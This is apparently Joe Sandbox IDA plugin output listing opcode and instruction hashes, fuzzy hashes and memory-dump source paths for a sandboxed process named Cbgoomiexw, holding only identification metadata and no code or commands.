                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 320d23a70709cf58a8d7f5353719f149deb634855f0226b0dab5dc5ec5ff5ebe
                                          • Instruction ID: 45222d62d9a947df22b24c5a0217dbb34bf38e4ba415facc0db1b855c3c1d133
                                          • Opcode Fuzzy Hash: 320d23a70709cf58a8d7f5353719f149deb634855f0226b0dab5dc5ec5ff5ebe
                                          • Instruction Fuzzy Hash: 75211471E00229DFEB90DFB9D844BAEBBF9EF44240F108066D559DB290E634CA55CBD1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb2951507f1b724d6d27b430a925e91c62fd535fc7172307bd4466c7f8044cc8
                                          • Instruction ID: 18d27ca3261241a783c36628a43c934182acc3555e0f332889a4cb10fc159b36
                                          • Opcode Fuzzy Hash: cb2951507f1b724d6d27b430a925e91c62fd535fc7172307bd4466c7f8044cc8
                                          • Instruction Fuzzy Hash: E911A075D0A294AFCB42DB71DD15AEBBFB8DF12200F1840A7E084DB052E2349A59CBF1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e677471173cebdd8ee30aa452f5c8f28c3b572e8a62a7116f5f2f74581c8421a
                                          • Instruction ID: 97ec9c10e7763238d02f13ad538a001d4a5c8ac600f5169413fb6e58a3a95153
                                          • Opcode Fuzzy Hash: e677471173cebdd8ee30aa452f5c8f28c3b572e8a62a7116f5f2f74581c8421a
                                          • Instruction Fuzzy Hash: 5C11D374B002149FCB608F788C05BAA7BF6AF88751F14402AE985DB280EB31C985CBE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76f517297a8a807ab01679c0fe9b302e0c9923cb59545065c4680600e1e09a72
                                          • Instruction ID: 0d9c36fa491dff14b62a6533a20fd2cf09e57742559abf561fb3efe61aca16e7
                                          • Opcode Fuzzy Hash: 76f517297a8a807ab01679c0fe9b302e0c9923cb59545065c4680600e1e09a72
                                          • Instruction Fuzzy Hash: 1D21D375A05219CFEBA4DF14CD44BE9B7FABB48304F0080E6E60DA7251D730AA85CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4136915f4f7d42ab68b83a887cef8bd8bbfdc9111daa36e7d42c7d28d90579bf
                                          • Instruction ID: 506f1ded8114307053aa1f60d42250a14a5b81d355f8ba0d017ce8972a9f6bd2
                                          • Opcode Fuzzy Hash: 4136915f4f7d42ab68b83a887cef8bd8bbfdc9111daa36e7d42c7d28d90579bf
                                          • Instruction Fuzzy Hash: 5B21C071A05229DFEBA4DF25CD40BE9B7F9BB49314F0080E6E609A7241D730AA84CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1879604159.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_241d000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                          • Instruction ID: bb96df18ce383b61f71e89f4bd7aba16673be7ccdd3a5c82b1d05ace210adef5
                                          • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                          • Instruction Fuzzy Hash: 701193B6904240DFDB16CF14D5C4B16BF72FB84324F24C6AAD9094B756C336D45ACBA2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c68e0ffb8ce1a7e30e2ee77e70a58277e689b0194ee5b4f0b5126ac8516f8b3
                                          • Instruction ID: 8b99aada0709b7a5864ca91645bb5dd4a2e248e4dabbd8118340a3c5b5de426f
                                          • Opcode Fuzzy Hash: 9c68e0ffb8ce1a7e30e2ee77e70a58277e689b0194ee5b4f0b5126ac8516f8b3
                                          • Instruction Fuzzy Hash: 2B217079A42219EFDB04CFA8D594EADB7F2BF49300F214159E906AB361CB30AD41CB50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df631b66fdbc2befb63138d1dca393b605b24a86f3256322900c138a03764dad
                                          • Instruction ID: 9025bf1c67f2c01ae09638047c1dd7acc24676ae3e0361d93de4dbb048e1ffeb
                                          • Opcode Fuzzy Hash: df631b66fdbc2befb63138d1dca393b605b24a86f3256322900c138a03764dad
                                          • Instruction Fuzzy Hash: 33118B70E04228DFEB90DF29D8417EABBB6FB4A310F0080A9E509A7354CB3559C8CF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19762f26860cc98d80a62c270f96c41616a2d3207c2c03678a322fd83aadfe22
                                          • Instruction ID: 25d3147fc713c035ccae0256572921d06d4588286287ae08e1afdf0563a309f0
                                          • Opcode Fuzzy Hash: 19762f26860cc98d80a62c270f96c41616a2d3207c2c03678a322fd83aadfe22
                                          • Instruction Fuzzy Hash: 22018436340215AFDB048E59DC84FAA7BAAEBD8721F108066FA14CB290C6B1D9018BA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94b6d70a52524a7a9cb6229859592391347b9f1bf3a98dfadfb96a018e2d6b5e
                                          • Instruction ID: d4372084b66e89f56ab7fadf5cacf06f71f443e5b5c3463ac09cfd69d5ba7537
                                          • Opcode Fuzzy Hash: 94b6d70a52524a7a9cb6229859592391347b9f1bf3a98dfadfb96a018e2d6b5e
                                          • Instruction Fuzzy Hash: CC01D475D09255AECB529FB5D805AEFBFF8DF15200F1444A7E184DB042E3348658CBE0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5a317b00eb015985fa5987786bcdbd53c837aea72361b26c278ed304908b09d
                                          • Instruction ID: e949f1580bf30af22149a974f98552237dfa54b0dbe1450d8ea5d2493c9ac277
                                          • Opcode Fuzzy Hash: a5a317b00eb015985fa5987786bcdbd53c837aea72361b26c278ed304908b09d
                                          • Instruction Fuzzy Hash: 9F110670E01228CFDBA4DF29C8917ACBBB6FF4A300F1061AAC049A7251DB745D81CF40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 143cf4ddecf1f7a71b299b111fc0247baedfe29cd58000f1bf513815ef75db62
                                          • Instruction ID: 685c6a8ecc1b6a0585f0552bfbff1fb672249219b7f87144f3145e706f1f6ba5
                                          • Opcode Fuzzy Hash: 143cf4ddecf1f7a71b299b111fc0247baedfe29cd58000f1bf513815ef75db62
                                          • Instruction Fuzzy Hash: 5121CF749442698FEBA4DF28C965AD9B7B1EB48304F1040EAE55DE7295DB709EC48F00
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e89e2fdf9302bd73299cb9c4958f893487f4f60ab3a08cf737029e7f1b4b17d
                                          • Instruction ID: a00f40d4d6e85a17e8c740a8748cb9c1268462e9faf8c2142088793b775ea822
                                          • Opcode Fuzzy Hash: 0e89e2fdf9302bd73299cb9c4958f893487f4f60ab3a08cf737029e7f1b4b17d
                                          • Instruction Fuzzy Hash: FE11A2B4E0021D9FDB48DFA9C8557AEBBF1FF88300F10856A9518A7354DB345A419F91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e579bc1bddd984c547aa8f46e6d5260147d24f513b892664d187eeea5ffbc81
                                          • Instruction ID: 398d6d74c417b2607e24bb89cae265e255ea98408e713dd13bb212977a3b064b
                                          • Opcode Fuzzy Hash: 6e579bc1bddd984c547aa8f46e6d5260147d24f513b892664d187eeea5ffbc81
                                          • Instruction Fuzzy Hash: C8F0F435F492615FE7164B38580072ABBF5AFC9710F1844ABE585DB392DA629C49C3C0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08ab758675a16a9d1ff6b3078ab3576b0044a6998abe62777a2fd92f91bc4bfd
                                          • Instruction ID: 08ada75ec61370cf703a6faf7746b205bce7998694d600703fda46145334358f
                                          • Opcode Fuzzy Hash: 08ab758675a16a9d1ff6b3078ab3576b0044a6998abe62777a2fd92f91bc4bfd
                                          • Instruction Fuzzy Hash: 4D11D675A04218CFEB50EF65D85579EBBF2EB88304F1094EAD50AB7748DA309E85CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9611a9e4a6eeff19df5a5e39ad131bc25daf5fd4753c15e4f21a4182a3b8793c
                                          • Instruction ID: 0c3f32c1b7eb9115a427d84f9d8b438a53e753300ea5e1b62e247946f872c93d
                                          • Opcode Fuzzy Hash: 9611a9e4a6eeff19df5a5e39ad131bc25daf5fd4753c15e4f21a4182a3b8793c
                                          • Instruction Fuzzy Hash: 24F06D353053919FC7058F2AD884D9A7BF9EF9A62031544AAF544CB261CA30DC05CBA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd9ce31c2bbbcc042fca7a351a4a96e6e1e57fe6f576f4901198a1ab14125b5a
                                          • Instruction ID: 68dab2db9de42f9ae21ec5bfc0df04b0e376d973cf83448582822eb84e9014b8
                                          • Opcode Fuzzy Hash: bd9ce31c2bbbcc042fca7a351a4a96e6e1e57fe6f576f4901198a1ab14125b5a
                                          • Instruction Fuzzy Hash: DA0169393006109FC7099B35D05491EBBA6EFCC711B108129EA0A8B394CF36ED42CBC4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c451a482cfc38b88fc2d16008cf95e6213eefb4546d7ac9b43871150f05ec761
                                          • Instruction ID: d0c05e6cff062d97d7a02ea2cb527a390c1e85c3d8e0633712e5e243a0a5f682
                                          • Opcode Fuzzy Hash: c451a482cfc38b88fc2d16008cf95e6213eefb4546d7ac9b43871150f05ec761
                                          • Instruction Fuzzy Hash: DEF02462F0D2A09FE35207385C10325BBE58FD6201F09409BD0869F3E2EAA68806C3C0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b87e9566a54334dee60cc8127f0943fad501ab03b437f1776a5eff3e5958642
                                          • Instruction ID: 815a1abb2234418b664cf504461636bb75bf86d31cd61f23304bb6b05e9b8b88
                                          • Opcode Fuzzy Hash: 7b87e9566a54334dee60cc8127f0943fad501ab03b437f1776a5eff3e5958642
                                          • Instruction Fuzzy Hash: DA113974A00218CFCB94EF28E891BE973B2BB4A304F5055E5D1499B258DB309D81CF40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc4177c9aaf4eaaa8bce8d2e0559e9a227067509caf86448fbe1e26cdef668d1
                                          • Instruction ID: 4731dc0594fecd795abd52290c568d2ea4ca1ff7c3036903ade37c7d92c259d9
                                          • Opcode Fuzzy Hash: dc4177c9aaf4eaaa8bce8d2e0559e9a227067509caf86448fbe1e26cdef668d1
                                          • Instruction Fuzzy Hash: 47F0E931F442255FE7158718980072BF7E9EBC8720F14402AD5099B381DAB2EC4183C4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 269502773189f2e9d7ba2f2bcf1abad74fa15fa54a7d4f7b7fe5e8af64752e68
                                          • Instruction ID: 0c9d6904826c79f4c790a7594f85ec7ea96b58676176414a6ff9a0d5cfe6a7f1
                                          • Opcode Fuzzy Hash: 269502773189f2e9d7ba2f2bcf1abad74fa15fa54a7d4f7b7fe5e8af64752e68
                                          • Instruction Fuzzy Hash: 77016930C08248AFCB45DFB4D4115ACFFF4EF49210F1080EAD88893261D6355A91DB80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdbde63b8ef66264cb3e3c1fa8f9a5bf4fadd9e3535248cbc350d6acd0bb9e90
                                          • Instruction ID: 98db170f5e5d41fdf07c8096a7d0c129b5447e9c607cf1bb4f744912ec5aa042
                                          • Opcode Fuzzy Hash: fdbde63b8ef66264cb3e3c1fa8f9a5bf4fadd9e3535248cbc350d6acd0bb9e90
                                          • Instruction Fuzzy Hash: C2F09635908354AFC705CF64E488BDDBFB69B45210F0480AAE045D7151DB345B85CBE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03adff58042eb2e9236ee549324fecdfbf3e6b582bf657dbe7eba08f59666cbf
                                          • Instruction ID: 983736f0cc1162b9ce1a2c6c86ed8ba2573891bd1db171b27a78b30249623913
                                          • Opcode Fuzzy Hash: 03adff58042eb2e9236ee549324fecdfbf3e6b582bf657dbe7eba08f59666cbf
                                          • Instruction Fuzzy Hash: 07F06D34808248EFCB41DFB4C8419A9BFB4EF49300F10C59AE89497261C231AA61EF91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf761e2a3ddfc1839f11f262e16083eda6e7226727ae041c1bd559a19cc4d8e6
                                          • Instruction ID: eed284cf25fb79f9f8b8d2867921a7294206c645529c0807679e60874d709aee
                                          • Opcode Fuzzy Hash: bf761e2a3ddfc1839f11f262e16083eda6e7226727ae041c1bd559a19cc4d8e6
                                          • Instruction Fuzzy Hash: AAF036712003159BC710DF19D884E8BF7AAEFD4311B008E2AB51A87655DAB0B9898790
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8bd88300836d887777d20a308977fce5877e84cafc3338af459785cfd51aba72
                                          • Instruction ID: 74140e4f5fa45358abbae0322ddd02554e26e5e6091ca59e5b711aeb71c08329
                                          • Opcode Fuzzy Hash: 8bd88300836d887777d20a308977fce5877e84cafc3338af459785cfd51aba72
                                          • Instruction Fuzzy Hash: 40F09A35909248FFCB06DFA4C8419EDFFB8EF49310F10C1AAE89496262D6319A51DFA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2556b790aa2b5ffb01e41a3e432dae3e537aa4ecda80e3159a3cc621385a1b09
                                          • Instruction ID: d6014e5d73af6648d0c66379e8a9d02081a7b57938db3a99607b2ac2e0098213
                                          • Opcode Fuzzy Hash: 2556b790aa2b5ffb01e41a3e432dae3e537aa4ecda80e3159a3cc621385a1b09
                                          • Instruction Fuzzy Hash: 02F02238B283B29F9BD64A74AC42D73B7EC1B2109030524AAF403CB496E620C884CBE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b32a4d9601a025feb41eda3902e6fdce690a594cc2630715d747ad168b2ffec6
                                          • Instruction ID: 4cae29ec6923f1b02fcded4aec4e46bfbaca89f917cb109f34f7f4e4d7625a0a
                                          • Opcode Fuzzy Hash: b32a4d9601a025feb41eda3902e6fdce690a594cc2630715d747ad168b2ffec6
                                          • Instruction Fuzzy Hash: 87F0FE353407109FC718DF19D854D2A77BAEFC9B21B154069FA568B361CB71EC82DB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60b8887ab994726e36bb26ca7d905d1fa5d16bc463f6d4c36731a952d193898a
                                          • Instruction ID: 40d4a24e8ac679e7b92444eddb1d5abb5692d9886c39408f9485ea673d525de0
                                          • Opcode Fuzzy Hash: 60b8887ab994726e36bb26ca7d905d1fa5d16bc463f6d4c36731a952d193898a
                                          • Instruction Fuzzy Hash: 40011634E09318EFDB44DF68D889799BBB1EF46310F0000EAE149AB664CB745984CF45
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e5a4338974d94595174103ec1909545be62a63abbf1b83a07c7e5e05433e79c
                                          • Instruction ID: 05e38fc68ea616ef24e15ad34cf763a1f2060924a2930a649fdd88931aa4da1c
                                          • Opcode Fuzzy Hash: 2e5a4338974d94595174103ec1909545be62a63abbf1b83a07c7e5e05433e79c
                                          • Instruction Fuzzy Hash: 6701D274E05218CFEB94EF58D885B9DBBF2EB48304F1041AAE509A7744D7349989CF51
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21c6024fc1780ff85c0ea044d2d4aa61c1fc8f491d1a412937b3f4b2b512a922
                                          • Instruction ID: 8f92132d8c5628d03dcd9d000a0add1e590b04b914d83ba70a3eb633090eb40f
                                          • Opcode Fuzzy Hash: 21c6024fc1780ff85c0ea044d2d4aa61c1fc8f491d1a412937b3f4b2b512a922
                                          • Instruction Fuzzy Hash: F6F03434D09248EFC781CFA8C9402ACBBB0EB4A210F1480DBE85897312D2354A46CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 872cb357e40c6f29ef0bcf54b4dd1fdd28f0e46bfff784cf6fca9dbd5efe1122
                                          • Instruction ID: 734a5aee8990165e16dd0b49feb57e454eb64a51464da1383fd781dc530a4ef3
                                          • Opcode Fuzzy Hash: 872cb357e40c6f29ef0bcf54b4dd1fdd28f0e46bfff784cf6fca9dbd5efe1122
                                          • Instruction Fuzzy Hash: 76F09A34808248AFC701DFA4D4105ACFFF5EB49310F2480AADC944A251C636AA91DF91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4df1ca1f88aadf7bede65ffbf44fc0f401c9a8ea3c0813fc8c403c82966c1c3
                                          • Instruction ID: e150c1e46926e3ca4e4bb317080a1a254490913f8f5448b6e471aaa7758ab2a0
                                          • Opcode Fuzzy Hash: a4df1ca1f88aadf7bede65ffbf44fc0f401c9a8ea3c0813fc8c403c82966c1c3
                                          • Instruction Fuzzy Hash: B3F03A34D09288EFCB82CBB4D9142ACBFB0EF4A210F1880DED89897352D6344A45CB40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80d916b0c810befac2df6370ff10432a96b35cc63182cb6940f3e948914ee823
                                          • Instruction ID: e01561c61314e5e59b2d194bd6d95f68eac4e1bb00d0ac95e728366b82e7af50
                                          • Opcode Fuzzy Hash: 80d916b0c810befac2df6370ff10432a96b35cc63182cb6940f3e948914ee823
                                          • Instruction Fuzzy Hash: 08F0E270808248EFCB80DFB4CA4529CBBB1EB09200F2441AFC858D3701E6329A95CB81
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52b6b58e07bc542d91d0d3ea4d47fb7ad33bf08f706736ee011b60476f28cb54
                                          • Instruction ID: 3f56a28b2354a369c66b5f4706f4d6fb75dd4f3b1a03cdbe9e11ecc182c9da61
                                          • Opcode Fuzzy Hash: 52b6b58e07bc542d91d0d3ea4d47fb7ad33bf08f706736ee011b60476f28cb54
                                          • Instruction Fuzzy Hash: 47F09074604214CFD750EF94C8999DAB7F2FB48300F1080D6D519A7748DB349E82DF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fead262a4ca762c2693c8c16d793d215d1c6a2847f995bf2ac0815ea925352dc
                                          • Instruction ID: d4dc4e89fa9684cba76312e5d1ded3724306cf5abb89f2fad2cb26554d7e992d
                                          • Opcode Fuzzy Hash: fead262a4ca762c2693c8c16d793d215d1c6a2847f995bf2ac0815ea925352dc
                                          • Instruction Fuzzy Hash: 96E0683010C3608EDB921A300D407953FE40F03211F2800EFE544DF1D2C122C801C3D2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4597daf0c4508d3e869328673fe692df86adc874cfb4c5931f9bde65a2b2a5e
                                          • Instruction ID: 8436c1fb0ee2fcf7926c1eac727c7a6d3ea756f5089b8bcfdea17dd009f8698f
                                          • Opcode Fuzzy Hash: a4597daf0c4508d3e869328673fe692df86adc874cfb4c5931f9bde65a2b2a5e
                                          • Instruction Fuzzy Hash: DBE065348093049FC745DF74E8115A9BFB8EB55310F10809AD88467351CE31AE46CBA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70bd11a97333b331d4153c8a29f3d2234ab19f1d29f0099d6886e7150df30193
